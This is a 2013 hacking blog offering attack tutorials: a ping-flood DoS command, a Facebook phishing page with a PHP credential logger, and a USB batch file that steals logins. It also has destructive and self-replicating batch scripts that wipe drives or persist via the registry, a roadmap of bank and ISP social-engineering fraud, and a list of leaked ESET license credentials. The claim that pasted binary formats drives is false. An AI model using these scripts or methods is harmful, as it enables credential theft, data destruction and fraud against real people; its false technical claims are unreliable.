Join us on Facebook

Saturday 31 August 2013

HOW TO ENABLE/DISABLE TASK MANAGER?

HOW TO ENABLE/DISABLE YOUR TASK MANAGER?


Well, this situation might never arise when you need to Disable your Task manager. But more commonly it happens because of a virus attack. Viruses do disable the Task Manager. Now they do so by editing the Registry values. Even if you remove the viruses.
                                         
 the registry changes will remain and thy will continue to effect your system, until you correct them.
This is easy and I will let you know how this can be done with just a small change in Registry. Here’s what you need to do.
1. Go to Start –> Run, and open Regedit. 
 2. Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
3. If you are infected by a Virus then you will see a Dword Value “DisableTaskMgr“, if not, then create this new value.
4. To Enable it, give a value of “0“, and to Disable it, give it a value of “1“ This is a very simple method by which Task manager can be Enabled/ Disabled. Apart from that, if you are in a network, and want to disable Task manager for a user, then you need to change the Computer Policies

Friday 30 August 2013

Advanced method to deface a website?



How to deface a website with cmd?

Today I will discuss an Advanced Attack to Deface a site. This Attack is used to stop functioning of a site so that no one can access it.

NOTE: Remember friends this is purely for educational purposes, pleasedon't use this for illegal activities... Don't use it to harm any Server or site.[just Joking  :D] but you can get caught by police if you hack . Not My responsibility if you get caught...

DDoS Attack:

-Distributed denial-of-service attack (DDOS attack) is an attempt to make a computer resource unavailable to its intended users. One common method of attack involves sending an enormous amount of request to Server or site and server will be unable to handle the requests and site will be offline for some days or months depending upon the strength of Attack i.e. (Data Sent to the Site/Server)

Basic Procedure/Logic employed in DDOS :


1.) Open Command Prompt in windows by going to Start -> All Programs -> Accessories -> Command Prompt.

2.) Type "ping site-ip -l 5120 -n 100000 -w 1".

Here "site-ip" is the IP Address of Target, You can also use site-name like "www.google.com" instead of site-ip."5120" is the size of packet sent to the target Which is 5 KB in example."100000" is the no of requests sent to the Target. "- w 1" is the waiting time after each request which is 1 sec in example. You can change these parameters according to your need, but don't omit these.

This Attack is also called "Ping of Death"

But In Actual a Single Computer using this Attack cannot Deface a Site for long time. Hackers Create and install botnets on different computers as trojans and use those Comprised Computers also to send these Dummy Packets to Target. When a Large no of Compromised Computer send simultaneous Requests to the target, the target site will be offline and defaced.

(READ THIS MUST:- "You can get caught by police if you hack . Not My responsibility if you get caught"..)

if you like this article don't forget to give me like(y) n Share

http://www.facebook.com/ghostproductions525

Plzz Gyes..,share our page to ur Friends &
Keep reading our articles & Happy Hacking.

Thursday 29 August 2013

How to become a great hacker?





How to Become a Great Hacker?


1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH.


2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility.
3. Learn a programming language that's compatible with all OS - Perl, Python, C, ASM

4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI
5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games.
6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble.
7. Code a tool that uses grep to sort out unique code in source codes.
8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use.
9. Pick a kernel in linux or unix, also pick a Microsoft OS version lets say Winxp pro sp2 put them on the virtual desktops (vmware) and find and code a new local exploit in those versions, then install a Apache webserver on the Linux/Unix and a IIS webserver on the winxp pro and attempt to find and code a new local reverse_tcp_shell exploit.
10. Learn Cisco Router and Switch configuration and setup.
11. Learn Checkpoint Setup and Config
12. Learn Wifi scanning, cracking, sniffing.
13. Pick a person in you phonebook for the area code you live in or city then ring the person on a anonymous line like skype or a payphone or a carded sim and attempt to social engineer the person for his name, address, data of birth, city born, country born, ISP connected with, Phone company connected with, What bank he/she uses and anything else you can get. Then Attempt to ring using a spoof caller ID software with the person's phone number - call the ISP and try reset the password to his/her internet connection/web-mail, get access to bank account or ask them to send out a new *** to a new address (drop) with a new pin, reset of phone company passwords.
14. Use your information gathering skills to get all the information off a website like a shop then use the spoof caller-id software or hack your phone to show a new number of the Webserver's Tech Support number then ring the shop owner and try get the shop site password.
15. Do the same thing but attempt to use a web attack against a site or shop to gain admin access.
16. Once got access upload a shell and attempt to exploit the server to gain root using a exploit you coded not someone else s exploit.
17. Make your own Linux Distro
18. Use your own Linux Distro or use a vanilla Linux gnome (not kde) keep it with not much graphics so you can learn how to depend on the terminal and start from scratch install applications that you will only need for a blackbox (Security test box), make folders for fuzzers, exploits, scanners..etc Then load them up with your own scripts and other tools ( By this stage you shouldn't need to depend on other peoples scripts).
19. Learn macosx and attempt to gain access to a Macosx box whether it be your own or someone's else.
20. Create a secure home network and secure your own systems with your own Security policies and firewall settings.

All this isn't a over night learning it will take a nice 3 - 4 years to learn a bit of this 5+ years to learn most of it and even then you may need time to keep learn as IT keeps changing ever day.

As long as your dedicated to learning you won't have any problems and if you learn all that you should easy get a job in any company if you show proof that you can do these things (print out scripts that you made or put on disc) to show the companies.

ENJOY(-_-)

Tuesday 27 August 2013

How to use Whatsapp free for lifetime




Hello guyz 2day m going to show you how to use free whatsapp for lifetime!! Hope u like it 
Just Follow the steps below:




Make WhatsApp Free For Lifetime!
Step 1-Uninstall whatsapp,if your trial version is


finished,or you want to extend it for a year.


Step 2-Go to gmail application and create a new
gmail id.


Step 3-Once you have made it,wait for some
time (it totally depends on your connection
speed,ideally you should wait for 15-20
minutes)


Step 4-Go to google play,clickon the menu
button of your android and choose "Account
Settings".


Step 5-Once you have done this,you just need to
choose the new gmail account,you just
created,and download whatsapp once again.


Step 6-Now open whatsapp,and sign into your
whatsapp account...


Step 7-Enjoy!!
Note:- This way you will make it free for one
year,to make it free for lifetime,you will have to
apply this trick once every year.

ReGarDs (HaXoR)

Saturday 24 August 2013

Eset Smart Security Username nd passwords?



HelloOOoo guyzzzz hope u enjoy my posts ,,,,nd m sure abt this one too ,,,hope u luv it
ESET IS ONE OF THE MOST USED ANTIVIRUS BY THE PEOPLES ,,,,,, SOOO I THINK I SHOULD SHARE THIS USEFUL INFORMATION WITH YOU

ReGarDs (HaXoR)
ESET SMART SECURITY ACCOUNTS









ESET SMART SECURITY

Username:
EAV-0091677302
Password:
bkddjufknj
01-09-2013

Username:
EAV-0091677317
Password:
vux55mpsxs
01-09-2013

Username:
EAV-0091677334
Password:
bb6r8sehxx
01-09-2013


Username:
EAV-0091677359
Password:
f6n6epv2xn
01-09-2013

Username:
EAV-0091677381
Password:
ajpu289rdx
01-09-2013

EAV / EAVBE
Username:
EAV-0091969587
Password:
e6skvrxr7r
01-09-2013

Username:
EAV-0091969603
Password:
7c9hr54h4t
01-09-2013

Username:
EAV-0091969609
Password:
hed9p5j5r3
01-09-2013

Username:
EAV-0091969633
Password:
hj88bv4s7k
01-09-2013

Username:
EAV-0091969650
Password:
9j45mct6k3
01-09-2013

Wednesday 21 August 2013

How To Hack Windows 7 Password Using Ophcrack ?

How To Hack Windows 7 Password Using Ophcrack ?

hacking windows 7 password
In this tutorial i will teach you to hack Windows 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac. It allows you to recover or hack windows password.
How To Crack Windows 7 Password Using Ophcrack ?


Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

1. Download Opcrack Live Cd by Clicking Here. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
Windows XP: Click on ophcrack XP LiveCD.

2. Now burn the live image on to the cd.
3. Insert the disc into drive and restart you computer.
4. If everything goes right you will see screen like below.

5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the account is enabled you could log in without a password.

windows 7 password hacking
8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
9. Copy this hash value which is under NT Hash field.
10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
11. Type in the hash value you copied down in step 9, Enter the captche and click on Crack Hashes.

Tuesday 20 August 2013

How To Install Whatapp on Pc


HOW TO USE WHATSAPP ON PC (full tutorial with new tip and how to sync mobile app with pc )??

THIS TRICK IS POSTED AGAIN DUE TO THE REQUEST OF FRIENDS
HAVING PROBLEM IN USING BLUESTACK

1. First Download Bluestacks[Official Website Link given in comment box]. Choose the operating system which you are using either it might be Windows or Mac and
download the respective version and install the app.



2.If you are getting some
error like "The application
failed to initialized properly (0xc0000135) . Click on ok to terminate the application",then .NET
framework is missing on
your PC. Downld netframework After installing Bluestacks

3.open the Software and there you see some already installed apps.

4.Click on Search button
and search for WhatsApp .

5.Then you will be
suggested different
places from where you
can get Whatsapp App.I
prefer Google Play,so
just click on Whatsapp
Messenger on Google
Play column and install
the app.

6.After installing the App
open it then you have
to Choose your Country
and Enter Phone number to start using Whatsapp on your PC.

SYNC YOUR MOBILE APPS
Sync your mobile apps using Bluestack Cloud connect:

7.Open the BLUESTACKS
application and Click on
the settings button at
the right end.

8.Choose the first option
" cloud connect". A box opens select " yes" and click on next.

9.Enter your email address , Mobile number and click on " Register".

10.Now you will receive a
email with a Pin number.
Now take your android
mobile and Go to
market place and
search for " Bluestacks",

11.Download and install
the application. Open the application and enter the pin number that you
received.
That's it now you can
Sync any application on
your mobile with your
PC. That's all for now friends.

Enjoy using WhatsApp for PC.
(HaXoR)

Monday 19 August 2013

Hacking acounts like fb,twitter or any social media?

[Tutorial]
Okay Guys.
I gonna write a tutorial on hacking fb id or any social networking etc id with phishing..
(i personally dont have any intrest in hack by this :p)
i think most of pplz here know this. But i hope it will help some newbies.
Okay here we go.

Just Follow the steps:



1] 1st of all you'll need a hosting account.. I recommenthttp://000webhost.com/ because its newbie frndly and easy..

After you create an a/c on 000webhost log into you a/c.
You'll have a username like a123456 remember that.
Now to ftp details
2] change ftp password.
Remember the username and password.



3] now if you are using mobile device go to http:/w-ftp.tk and enter your details. And leave folder name blank and log in there.. If ur using pc you can use their ftp manager..
4]now you should get a fb phishing script. You can search it in google. Download a script which have auto detect wap and web.
5] upload that script in w-ftp.tk or watever file manager ur using.
6]open the script in public_html folder..
6]violla.! You done.  now give the site address to the 1 u wanna hack and if he/ she login from you phishing page the username password get saved into pass.txt..
..
If you wanna clone any site
Visit the page that you want to clone.
Save it (CTRL S) via your browser.
Choose save complete webpage while saving it via browser.
Give name index while saving. (Dont use other name!)
Save it to a folder.
Now, you should have one file named"index.htm"and a folder.
We have to edit index.htm file.
Edit it and search"action"without"". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php?login_attempt=1"method="post", We have to edit this line only. Change https://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.

How to create login.php?

Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php.

Code:

<?php
header ( "Location: http://www.google.com/" ) ;
$handle = fopen ( "passes.txt" , "a" ) ;
foreach ( $_GET as $variable => $value )
{
fwrite ( $handle , $variable ) ;
fwrite ( $handle , "=" ) ;
fwrite ( $handle , $value ) ;
fwrite ( $handle , "
" ) ;
}
fwrite ( $handle , "
" ) ;
fclose ( $handle ) ;
exit ;
?>
You have to change http://www.google.com/ to the site url that you are cloning, for example, change it to http://www.facebook.com/ if you are cloning facebook.

Now, you have your phishing page.

(this tutorial is strictly for educational purpose)

hope you like it.. 

Sunday 18 August 2013

Facebook phishing using a USB drive ?

Facebook phishing using a USB
drive

Hello guyzzz HaXoR is here ,,,with a awesome trick to hack someone acount..
Hope u like it,, we can use a usb to hack fb accounts by just following the steps given below
just follow the steps:

Here is a simple trick to get the
Email and password of a person via
a
USB drive with some social
engineering.



1. Open notepad and paste the
following code and leave a blank
line
after the code.
TITLE FBChat
ECHO OFF
COLOR 03
CLS

ECHO.
ECHO LOGIN TO START CHATTING
ON
FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.
bat
ECHO PASSWORD = %PSWD
%>>FBChat. bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while
connecting to the server. Try again
later.
PAUSE>NUL
EXIT
---------- Below this line are the
collected information ----------
2. Save the code as FBChat.bat
exactly. Do not name it anything
else
or it won't work.
3. Put the batch file into a USB
drive
and give it to your friend.
When you get back the USB drive,
right click the batch file and select
Edit. Now scroll downand you will
see
the information collected!
With some social engineering the
trick can be very efficient. Before
trying this trick out you can tell the
victim you are making a cool
software
and it will be finished soon. Than
give the batch file telling him that is
the software you made. Try to be
convincing and do not let him/her
smell a rat! I have tried thistrick on
some of my friends with 100
percent
success.
Give it a try yourself...

Thursday 15 August 2013

How to format hard drive using notepad?





A simple binary codes that can format the system drive ,secondary drives…

Copy The Following In Notepad Exactly as it



01001011000111110010010101010101010000011111100000

Save As An EXE Any Name Will Do

Send the EXE to People And Infect
Some other interesting formatting codes….



format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

Some more interesting stuff ..

open notepad



erase c:\windows

and save as

FINDOUTANAME.cmd

wat does it do:- will erase c:/windows .

Here is another one which is funny……

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “Your computer has committed suicide. Have a nice day.”

This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat

This code about the computer shutdown:

@echo off
shutdown -s -t 5 -c “Shutdown”

Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

save it as Dell.bat

Want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

One more …

try one this

Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc.

NOTE :- Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them …

For this u need a registry updater software .

now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..

Do not try it on your PC. Don’t mess around this is for educational purpose only

Batch VIRUS Killing “ NORTON, LIMEWIRE, EXPLORER, MSN “

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don’t tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)

Set oWMP = CreateObject(“WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
end if

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

loop

A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g

A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)

@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it

A batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc

This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want

Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"

Carpet Bomb:

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.

@ECHO OFF
:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
lease only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer 
:theend

HaXoR

© 2013 Noobs-Acadmy. All rights resevered. Designed by Templateism